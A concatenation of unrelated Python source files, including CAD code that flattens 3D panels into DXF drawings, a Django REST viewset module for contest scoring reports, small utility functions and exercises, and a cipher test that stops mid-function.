endroit2DBasChainette = di.Endroit2D({"point2D": {"x": x, "y": y}})
self.lendroit2DBasChainette.append(endroit2DBasChainette)
dictCouture = {}
dictCouture["endroitDeb"] = self.lendroit2DHautChainette[-2]
dictCouture["endroitFin"] = self.lendroit2DHautChainette[-1]
dictCouture["fCouture"] = dictDevelopp2D["fCouture"]
(x1, y1, x2, y2) = Developp2D.couture(dictCouture=dictCouture)
endroit2DHautCouture = di.Endroit2D({"point2D": {"x": x1, "y": y1}})
self.lendroit2DHautCouture.append(endroit2DHautCouture)
endroit2DHautCouture = di.Endroit2D({"point2D": {"x": x2, "y": y2}})
self.lendroit2DHautCouture.append(endroit2DHautCouture)
#self.lendroit2DHautCouture.append(self.lendroit2DHautChainette[-1])
self.endroit2DMil = self.lendroit2DMil[-1]
self.endroit2DHaut = self.lendroit2DHaut[-1]
self.endroit2DBas = self.lendroit2DBas[-1]
#-----
def horiz(self) -> None:
"""
tout les points du panneau sont tournés pour être mis
à "l'horizontale" définie par l'axe du millieu du panneau
"""
alpha = di.Direction2D(self.lendroit2DMil[-1] - self.lendroit2DMil[0]).angle2D()
lendroit2DMil = []
lendroit2DHaut = []
lendroit2DBas = []
lendroit2DHautChainette = []
lendroit2DBasChainette = []
lendroit2DHautCouture = []
for i in self.lendroit2DMil:
lendroit2DMil.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHaut:
lendroit2DHaut.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DBas:
lendroit2DBas.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHautChainette:
lendroit2DHautChainette.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DBasChainette:
lendroit2DBasChainette.append(i.rot2d(fAth=-alpha))
for i in self.lendroit2DHautCouture:
lendroit2DHautCouture.append(i.rot2d(fAth=-alpha))
self.lendroit2DMil = lendroit2DMil
self.lendroit2DHaut = lendroit2DHaut
self.lendroit2DBas = lendroit2DBas
self.lendroit2DHautChainette = lendroit2DHautChainette
self.lendroit2DBasChainette = lendroit2DBasChainette
self.lendroit2DHautCouture = lendroit2DHautCouture
#-----
def createDxf(self, block) -> None:
"""
la mise en place du dxf
"""
        # the middle line, dotted
polyLineMil = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DMil:
polyLineMil.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the top line, dotted
polyLineHaut = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DHaut:
polyLineHaut.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the top chainette line, solid
polyLineHautChainette = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DHautChainette:
polyLineHautChainette.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the bottom line, dotted
polyLineBas = block.add_lwpolyline([], dxfattribs={'color': couleur["jaune"], 'linetype': 'DOT2'})
for i in self.lendroit2DBas:
polyLineBas.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the bottom chainette line, solid
polyLineBasChainette = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DBasChainette:
polyLineBasChainette.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the seam line, solid
polyLineHautCouture = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
for i in self.lendroit2DHautCouture:
polyLineHautCouture.append_points(points=[(i["point2D"]["x"], \
i["point2D"]["y"])], \
format='xy')
        # the section lines (the first and the last are drawn differently)
for i in range(len(self.lendroit2DBasChainette)):
if i == 0 or i == len(self.lendroit2DBasChainette)-1:
polyLineSection = block.add_lwpolyline([], dxfattribs={'color': couleur["bleu"]})
else:
polyLineSection = block.add_lwpolyline([], dxfattribs={'color': couleur["rouge"], 'lineweight': 20})
polyLineSection.append_points(points=[(self.lendroit2DBasChainette[i]["point2D"]["x"], \
self.lendroit2DBasChainette[i]["point2D"]["y"])], \
format='xy')
polyLineSection.append_points(points=[(self.lendroit2DHautChainette[i]["point2D"]["x"], \
self.lendroit2DHautChainette[i]["point2D"]["y"])], \
format='xy')
        # a label with the panel number
endroit2DDeb = di.Endroit2D(self.lendroit2DHaut[0])
endroit2DFin = di.Endroit2D(self.lendroit2DHaut[-1])
intHautText = di.Endroit2D(endroit2DDeb.lin2d(k=0.97, endroit2D=endroit2DFin))
endroit2DDeb = di.Endroit2D(self.lendroit2DBas[0])
endroit2DFin = di.Endroit2D(self.lendroit2DBas[-1])
intBasText = di.Endroit2D(endroit2DDeb.lin2d(k=0.97, endroit2D=endroit2DFin))
debText = intHautText.lin2d(k=0.55, endroit2D=intBasText)
finText = intHautText.lin2d(k=0.45, endroit2D=intBasText)
        panneauNum = f'<-- bottom Panel number : {self.numPanneau} (offcut) top -->'
block.add_text(panneauNum, \
dxfattribs={'style': 'OpenSansCondensed-Bold'} \
).set_pos([debText["point2D"]["x"], debText["point2D"]["y"]], \
[finText["point2D"]["x"], finText["point2D"]["y"]], \
align='ALIGNED')
        # a label on the offcut
endroit2DDeb = di.Endroit2D(self.lendroit2DMil[0])
endroit2DFin = di.Endroit2D(self.lendroit2DMil[-1])
debText = endroit2DDeb.lin2d(k=0.10, endroit2D=endroit2DFin)
finText = endroit2DDeb.lin2d(k=0.15, endroit2D=endroit2DFin)
        copyRight = f'Created by Pyjunk on {datetime.utcnow():%c} UTC±00:00'
block.add_text(copyRight, \
dxfattribs={'style': 'OpenSansCondensed-Bold'} \
).set_pos([debText["point2D"]["x"], debText["point2D"]["y"]], \
[finText["point2D"]["x"], finText["point2D"]["y"]], \
align='ALIGNED')
#-----
def __str__(self) -> str:
strMsg = f'--> Developp2D :\n'
return strMsg
#----- Class representing the flattened development of a panel
class Developp(Developp2D):
"""
Classe Developp
===============
La classe Developp représente la partie 3D du calcul de développé
:datas:
self.dictDevelopp: dict
self.endroit3DMil: Endroit3D
self.endroit3DHaut: Endroit3D
self.endroit3DBas: Endroit3D
:Example:
>>> a = Developp({"numPanneau": 0})
>>> print(a)
--> Developp :
<BLANKLINE>
.. seealso::
.. warning::
.. note::
.. todo::
"""
#-----
def __init__(self, dictDevelopp: dict) -> None:
self.dictDevelopp = dictDevelopp
        # the previous 3D points
self.endroit3DMil = None
self.endroit3DHaut = None
self.endroit3DBas = None
Developp2D.__init__(self, dictDevelopp2D=self.dictDevelopp)
#-----
def comp(self, dictDevelopp: dict) -> None:
"""
La stratégie pour calculer les différents points du développé est simple.
Ici on est dans l'espace 3D, dans la fonction hérité on est dans l'espace 2D.
Le principe : en 3D, on mesure les distances du point recherché par rapport à
2 autres points, on reporte ces distances en 2D à partir de 2 autres points 2D
pour trouver le point 2D sur le développé
"""
if "dictBas" in dictDevelopp and isinstance(dictDevelopp["dictBas"], dict):
endroit3DBas = di.Endroit3D(dictDevelopp["dictBas"])
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "dictHaut" in dictDevelopp and isinstance(dictDevelopp["dictHaut"], dict):
endroit3DHaut = di.Endroit3D(dictDevelopp["dictHaut"])
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "dictMil" in dictDevelopp and isinstance(dictDevelopp["dictMil"], dict):
endroit3DMil = di.Endroit3D(dictDevelopp["dictMil"])
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "frac" in dictDevelopp and isinstance(dictDevelopp["frac"], float):
frac = dictDevelopp["frac"]
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "index" in dictDevelopp and isinstance(dictDevelopp["index"], int):
index = dictDevelopp["index"]
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
if "fCouture" in dictDevelopp and isinstance(dictDevelopp["fCouture"], float):
fCouture = dictDevelopp["fCouture"]
else:
            print('< !!!! > invalid dictionary for dictDevelopp')
            print('program aborted')
sys.exit(ABNORMAL_TERMINATION)
        # populate a dictDevelopp2D
dictDevelopp2D = {}
dictDevelopp2D["index"] = index
dictDevelopp2D["fCouture"] = fCouture
if index == 0:
            # on the first pass, mil is (0, 0) by definition, so we skip it
            # and only handle haut, bas, hautchainette, baschainette
dictDevelopp2D["fdist3DMilHaut"] = endroit3DMil.dist3d(endroit3DHaut)
dictDevelopp2D["fdist3DMilBas"] = endroit3DMil.dist3d(endroit3DBas)
endroit3DHautChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DHaut))
dictDevelopp2D["fdist3DMilHautChainette"] = endroit3DMil.dist3d(endroit3DHautChainette)
endroit3DBasChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DBas))
dictDevelopp2D["fdist3DMilBasChainette"] = endroit3DMil.dist3d(endroit3DBasChainette)
else:
            # on the following passes
            # we handle mil, haut, bas, hautchainette, baschainette
dictDevelopp2D["fdist3DMilMil"] = self.endroit3DMil.dist3d(endroit3DMil)
dictDevelopp2D["fdist3DHautMil"] = self.endroit3DHaut.dist3d(endroit3DMil)
dictDevelopp2D["fdist3DMilHaut"] = self.endroit3DMil.dist3d(endroit3DHaut)
dictDevelopp2D["fdist3DHautHaut"] = self.endroit3DHaut.dist3d(endroit3DHaut)
dictDevelopp2D["fdist3DMilBas"] = self.endroit3DMil.dist3d(endroit3DBas)
dictDevelopp2D["fdist3DBasBas"] = self.endroit3DBas.dist3d(endroit3DBas)
endroit3DHautChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DHaut))
dictDevelopp2D["fdist3DMilHautChainette"] = self.endroit3DMil.dist3d(endroit3DHautChainette)
dictDevelopp2D["fdist3DHautHautChainette"] = self.endroit3DHaut.dist3d(endroit3DHautChainette)
endroit3DBasChainette = di.Endroit3D(endroit3DMil.lin3d(k=frac, endroit3D=endroit3DBas))
dictDevelopp2D["fdist3DMilBasChainette"] = self.endroit3DMil.dist3d(endroit3DBasChainette)
dictDevelopp2D["fdist3DBasBasChainette"] = self.endroit3DBas.dist3d(endroit3DBasChainette)
        # run the computation in 2D space
Developp2D.comp(self, dictDevelopp2D=dictDevelopp2D)
        # save the points for the next pass
self.endroit3DMil = endroit3DMil
self.endroit3DHaut = endroit3DHaut
self.endroit3DBas = endroit3DBas
#-----
def __str__(self) -> str:
strMsg = f'--> Developp :\n'
return strMsg
#----- start here
if __name__ == '__main__':
import doctest
(failureCount, testCount) = doctest.testmod(verbose=False)
    print(f'number of tests : {testCount:>3d}, number of errors : {failureCount:>3d}', end='')
if failureCount != 0:
        print(f' --> Aborting program {pathlib.Path(__file__)}')
sys.exit(ABNORMAL_TERMINATION)
else:
print(f' --> All Ok {pathlib.Path(__file__)}')
sys.exit(NORMAL_TERMINATION)
|
"""PPOPT INIT FILE - todo fill in."""
|
def dict_get(mydict, list_keys, default=None):
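    """Return the value at the nested key path list_keys, or default if any key is missing."""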
assert isinstance(mydict, dict)
assert isinstance(list_keys, (list, tuple))
num_keys = len(list_keys)
if num_keys == 1:
return mydict.get(list_keys[0], default)
elif list_keys[0] not in mydict:
return default
else:
return dict_get(mydict[list_keys[0]], list_keys[1:], default)
def dict_set(mydict, list_keys, value):
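    """Set value at the nested key path list_keys, creating intermediate dicts as needed."""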
assert isinstance(mydict, dict)
assert isinstance(list_keys, (list, tuple))
assert len(list_keys) > 0
if len(list_keys) == 1:
mydict[list_keys[0]] = value
return
dict_set(mydict.setdefault(list_keys[0], dict()), list_keys[1:], value)
def dict_has_keys(mydict, list_keys):
"""
check if specified dict has nested keys defined by list_keys
:param mydict:
:param list_keys:
:return: check if specified dict has nested keys like: mydict[list_keys[0]][list_keys[1]] ...
"""
assert isinstance(list_keys, (list, tuple))
if not isinstance(mydict, dict):
return False
if len(list_keys) == 1:
return list_keys[0] in mydict
if list_keys[0] in mydict:
return dict_has_keys(mydict[list_keys[0]], list_keys[1:])
else:
return False
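# A minimal usage sketch (example data, comments only):
# d = {}
# dict_set(d, ['a', 'b', 'c'], 1)       # d == {'a': {'b': {'c': 1}}}
# dict_get(d, ['a', 'b', 'c'])          # -> 1
# dict_get(d, ['a', 'x'], default=0)    # -> 0
# dict_has_keys(d, ['a', 'b'])          # -> True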
|
import sys
H, W, h, w = map(int, sys.stdin.read().split())
def main():
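    # the expression below is the inclusion-exclusion expansion of
    # (H - h) * (W - w): H*W - h*W - H*w + h*w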
res = H * W - (h*W + H*w - h*w)
print(res)
if __name__ == '__main__':
main()
|
# Standard Library
import json
import logging
import re
import uuid
# Third-Party
import pydf
from rest_framework_json_api.filters import OrderingFilter
from rest_framework_json_api.django_filters import DjangoFilterBackend
from django_fsm import TransitionNotAllowed
from dry_rest_permissions.generics import DRYPermissions
from rest_framework import status
from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.permissions import AllowAny
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.parsers import JSONParser
# Django
from django.apps import apps
from django.core.files.base import ContentFile
from django.db.models import Sum, Q, Avg
from django.template.loader import render_to_string
from django.utils.text import slugify
from django.utils.six import BytesIO
from collections.abc import Iterable
from django.contrib.auth import get_user_model
# Local
# from .filterbackends import AppearanceFilterBackend
# from .filterbackends import OutcomeFilterBackend
# from .filterbackends import ScoreFilterBackend
# from .filterbackends import SongFilterBackend
from .filtersets import RoundFilterset
from .filtersets import ScoreFilterset
from .models import Appearance
from .models import Outcome
from .models import Panelist
from .models import Round
from .models import Score
from .models import Song
from apps.bhs.models import Convention
from .renderers import PDFRenderer
from .renderers import XLSXRenderer
from .renderers import DOCXRenderer
from .renderers import RTFRenderer
from .responders import PDFResponse
from .responders import XLSXResponse
from .responders import DOCXResponse
from .responders import RTFResponse
from .serializers import AppearanceSerializer
from .serializers import OutcomeSerializer
from .serializers import PanelistSerializer
from .serializers import RoundSerializer
from .serializers import ScoreSerializer
from .serializers import SongSerializer
from rest_framework.negotiation import BaseContentNegotiation

log = logging.getLogger(__name__)


class IgnoreClientContentNegotiation(BaseContentNegotiation):
def select_parser(self, request, parsers):
"""
Select the first parser in the `.parser_classes` list.
"""
return parsers[0]
def select_renderer(self, request, renderers, format_suffix):
"""
Select the first renderer in the `.renderer_classes` list.
"""
return (renderers[0], renderers[0].media_type)
class AppearanceViewSet(viewsets.ModelViewSet):
queryset = Appearance.objects.select_related(
'round',
# 'group',
# 'entry',
).prefetch_related(
'owners',
'songs',
# 'statelogs',
).order_by('id')
serializer_class = AppearanceSerializer
filterset_class = None
filter_backends = [
DjangoFilterBackend,
# AppearanceFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "appearance"
def perform_create(self, serializer):
Chart = apps.get_model('bhs.chart')
group_id = serializer.initial_data['group_id']
charts_raw = Chart.objects.filter(
groups__id=group_id,
).values(
'id',
'title',
'arrangers',
).order_by('title')
for c in charts_raw:
c['pk'] = str(c.pop('id'))
charts = [json.dumps(x) for x in charts_raw]
# print("add participants...")
serializer.save(charts=charts)
@action(methods=['get'], detail=True)
def mock(self, request, pk=None, **kwargs):
"""
Mocks an Appearance using fake data.
"""
object = self.get_object()
object.mock()
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def start(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.start(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def finish(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.finish(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def verify(self, request, pk=None, **kwargs):
object = self.get_object()
# For Choruses, ensure a valid number of participants on stage has been entered.
if object.kind == object.KIND.chorus and (object.pos is None or object.pos < 8):
return Response(
{'status': 'Please enter a valid number of Participants on stage.'},
status=status.HTTP_400_BAD_REQUEST,
)
try:
object.verify(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete. Unable to verify appearance. Check entered scores.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def complete(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.complete(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def advance(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.advance(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def scratch(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.scratch(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def disqualify(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.disqualify(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def variance(self, request, pk=None):
appearance = Appearance.objects.get(pk=pk)
# if appearance.variance_report:
# pdf = appearance.variance_report.file
# else:
pdf = appearance.get_variance()
file_name = '{0} Variance Report.pdf'.format(appearance)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def csa(self, request, pk=None):
"""
Renders the Competitor Scoring Analysis in PDF
"""
appearance = Appearance.objects.get(pk=pk)
# if appearance.csa_report:
# pdf = appearance.csa_report.file
# else:
pdf = appearance.get_csa()
file_name = '{0} CSA.pdf'.format(appearance)
file_name = re.sub('[^a-zA-Z0-9_ ]', '', file_name)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
class OutcomeViewSet(viewsets.ModelViewSet):
queryset = Outcome.objects.select_related(
'round',
# 'award',
).prefetch_related(
'statelogs',
).order_by('id')
serializer_class = OutcomeSerializer
filter_backends = [
DjangoFilterBackend,
# OutcomeFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "outcome"
class PanelistViewSet(viewsets.ModelViewSet):
queryset = Panelist.objects.select_related(
'round',
# 'user',
).prefetch_related(
'scores',
).order_by('id')
serializer_class = PanelistSerializer
filter_backends = [
DjangoFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "panelist"
def perform_create(self, serializer):
if serializer.initial_data['category'] == Panelist.CATEGORY.ca:
#
# Add CA as owner of Round, Session, and Convention
#
person_id = serializer.initial_data['person_id']
Person = apps.get_model('bhs.person')
person = Person.objects.get(pk=person_id)
User = get_user_model()
owner = User.objects.filter(email=person.email).first()
# Parent round to access session ID
parent_round = Round.objects.get(pk=serializer.initial_data['round']['id'])
# Session
Session = apps.get_model('registration.session')
session = Session.objects.get(pk=parent_round.session_id)
session.owners.add(owner.id)
# Rounds under session
rounds = Round.objects.filter(
session_id=session.id
)
for round in rounds:
round.owners.add(owner.id)
# Convention
convention = Convention.objects.get(pk=session.convention_id)
convention.owners.add(owner.id)
# Save Panelist record
serializer.save()
def partial_update(self, request, pk=None):
# Current object
object = self.get_object()
        if isinstance(request.data.get('airports'), str):
            log.debug("airports is string")
            request.data.pop('airports')
        try:
            # Validate the submitted data
            serializer = self.get_serializer(data=request.data)
            serializer.is_valid()
            # See if the submitted number is already in use in this round
            if (Panelist.objects.filter(
                num=request.data['num'],
                round_id=object.round_id,
            ).count()):
                raise ValueError()
            # Update Panelist
            return super().partial_update(request, pk=pk)
        except ValueError:
return Response(
{'status': 'Number is already in use by another judge.'},
status=status.HTTP_400_BAD_REQUEST,
)
def perform_destroy(self, instance):
print("perform_destroy function", instance.id)
if instance.category == Panelist.CATEGORY.ca:
#
# Remove CA as owner of Round, Session, and Convention
#
Person = apps.get_model('bhs.person')
person = Person.objects.get(pk=instance.person_id)
User = get_user_model()
owner = User.objects.filter(email=person.email).first()
# Round
parent_round = Round.objects.get(pk=instance.round_id)
# Session
Session = apps.get_model('registration.session')
session = Session.objects.get(pk=parent_round.session_id)
session.owners.remove(owner.id)
# Parent round to access session ID
rounds = Round.objects.filter(
session_id=session.id
)
for round in rounds:
round.owners.remove(owner.id)
# Convention
convention = Convention.objects.get(pk=session.convention_id)
convention.owners.remove(owner.id)
print("CA removed as owner")
# Remove Panelist record
return super().perform_destroy(instance)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def psa(self, request, pk=None):
panelist = Panelist.objects.get(pk=pk)
# if panelist.psa_report:
# pdf = panelist.psa_report.file
# else:
pdf = panelist.get_psa()
file_name = '{0} PSA.pdf'.format(panelist)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
class RoundViewSet(viewsets.ModelViewSet):
queryset = Round.objects.select_related(
# 'session',
).prefetch_related(
'owners',
'appearances',
# 'appearances__owners',
# 'appearances__songs',
# 'panelists__scores',
# 'outcomes__award',
).order_by('id')
serializer_class = RoundSerializer
filterset_class = RoundFilterset
filter_backends = [
DjangoFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "round"
@action(methods=['get'], detail=True)
def mock(self, request, pk=None, **kwargs):
object = self.get_object()
object.mock()
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def reset(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.reset(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def build(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.build(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def start(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.start(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def complete(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.complete(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def finalize(self, request, pk=None, **kwargs):
object = self.get_object()
try:
object.finalize(by=self.request.user)
except TransitionNotAllowed:
return Response(
{'status': 'Information incomplete.'},
status=status.HTTP_400_BAD_REQUEST,
)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(methods=['post'], detail=True)
def publish(self, request, pk=None, **kwargs):
object = self.get_object()
# try:
# object.publish(by=self.request.user)
# except TransitionNotAllowed:
# return Response(
# {'status': 'Information incomplete.'},
# status=status.HTTP_400_BAD_REQUEST,
# )
object.publish(by=self.request.user)
object.save()
serializer = self.get_serializer(object)
return Response(serializer.data)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def oss(self, request, pk=None):
round = Round.objects.select_related(
# 'session',
# 'session__convention',
).get(pk=pk)
# if round.oss_report:
# pdf = round.oss_report.file
# else:
pdf = round.get_oss(request.user.name)
file_name = '{0} OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def legacy(self, request, pk=None):
round = Round.objects.get(pk=pk)
if round.legacy_oss:
pdf = round.legacy_oss.file
else:
pdf = round.get_legacy_oss()
file_name = '{0} Legacy OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def legacyoss(self, request, pk=None):
round = Round.objects.select_related(
).get(pk=pk)
# if round.legacy_oss:
# pdf = round.legacy_oss.file
# else:
pdf = round.get_legacy_oss()
file_name = '{0} Legacy OSS.pdf'.format(round)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
PDFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def titles(self, request, pk=None):
round = Round.objects.prefetch_related(
'appearances',
).get(pk=pk)
pdf = round.get_titles()
file_name = '{0} Titles Report'.format(
round.nomen,
)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[PDFRenderer],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def sa(self, request, pk=None):
round = Round.objects.select_related(
# 'session',
# 'session__convention',
).get(pk=pk)
# if round.sa_report:
# pdf = round.sa_report.file
# else:
pdf = round.get_sa(request.user.name)
file_name = '{0} SA'.format(
round.nomen,
)
return PDFResponse(
pdf,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['get'],
detail=True,
renderer_classes=[
DOCXRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def announcements(self, request, pk=None):
round = Round.objects.select_related(
).get(pk=pk)
docx = round.get_announcements()
file_name = '{0} Announcements'.format(
round.nomen,
)
return DOCXResponse(
docx,
file_name=file_name,
status=status.HTTP_200_OK
)
@action(
methods=['post'],
detail=True,
renderer_classes=[
RTFRenderer,
],
permission_classes=[DRYPermissions],
content_negotiation_class=IgnoreClientContentNegotiation,
)
def labels(self, request, pk=None, **kwargs):
round = self.get_object()
# Parse inbound request
if len(request._request.body):
content = BytesIO(request._request.body)
data = JSONParser().parse(content)
else:
data = {}
convention = Convention.objects.filter(
id=round.convention_id
).first()
# File name postfix
postfix = ""
        if len(data):
            postfix = "_" + data.get('postfix', '').strip()
        rtf = round.get_labels(request, data)
        # Concatenate the file name
        file_name = '{0}_Lbls{1}'.format(
convention.base_filename(),
postfix
)
return RTFResponse(
rtf,
file_name=file_name,
status=status.HTTP_200_OK
)
class ScoreViewSet(viewsets.ModelViewSet):
queryset = Score.objects.select_related(
'song',
'song__appearance',
'song__appearance__round',
'panelist',
).prefetch_related(
).order_by('id')
serializer_class = ScoreSerializer
filterset_class = ScoreFilterset
filter_backends = [
DjangoFilterBackend,
# ScoreFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "score"
    def partial_update(self, request, pk=None):
        object = self.get_object()
        # Update Score
        super().partial_update(request, pk=pk)
        # Reset the appearance status
        appearance = Appearance.objects.filter(
            id=object.song.appearance.id
        )
        # Update appearance stats
        stats = appearance[0].get_stats()
        appearance.update(
            status=Appearance.STATUS.finished,
            stats=stats
        )
        # Re-run the update so the response reflects the saved score
        return super().partial_update(request, pk=pk)
class SongViewSet(viewsets.ModelViewSet):
queryset = Song.objects.select_related(
'appearance',
).prefetch_related(
'scores',
'scores__panelist',
).order_by('id')
serializer_class = SongSerializer
filterset_class = None
filter_backends = [
DjangoFilterBackend,
# SongFilterBackend,
]
permission_classes = [
DRYPermissions,
]
resource_name = "song"
|
# Modify the program to display the numbers from 50 to 100
n = 50
while n <= 100:
print(n)
n += 1
|
import logging
import time
import uuid
from db.DAO import DAO
from db.DBEngine import DBEngine
from AppConfig import db_config
from bson import json_util
import json
logger = logging.getLogger(__name__)
class ProfilerController:
    @classmethod
    def get_investor(cls, id):
        DBEngine.create_db_engine()
        response = DAO.get_investor(id)
        logger.info(response)
        return response

    @classmethod
    def add_investor(cls, res):
        DBEngine.create_db_engine()
        response = DAO.add_new_investor(res)
        logger.info(response)
        return response
def gen_id():
id = uuid.uuid1()
final_id = id.hex
return final_id
def parse_json(data):
return json.loads(json_util.dumps(data))
|
class BaseError(Exception):
def __repr__(self):
return '<BaseError>'
class HandlerTypeError(BaseError):
    def __init__(self, name):
        self.name = name
        self.message = 'Handler function "%s" should be a coroutine.' % self.name
        super().__init__(self.message)
def __repr__(self):
return '<HandlerTypeError(name=%s)>' % self.name
|
from cipher_ajz2123 import __version__
from cipher_ajz2123 import cipher_ajz2123
def test_version():
assert __version__ == '0.1.0'
def test_cipher():
example = 'abc'
shift = 5
expected = 'fgh'
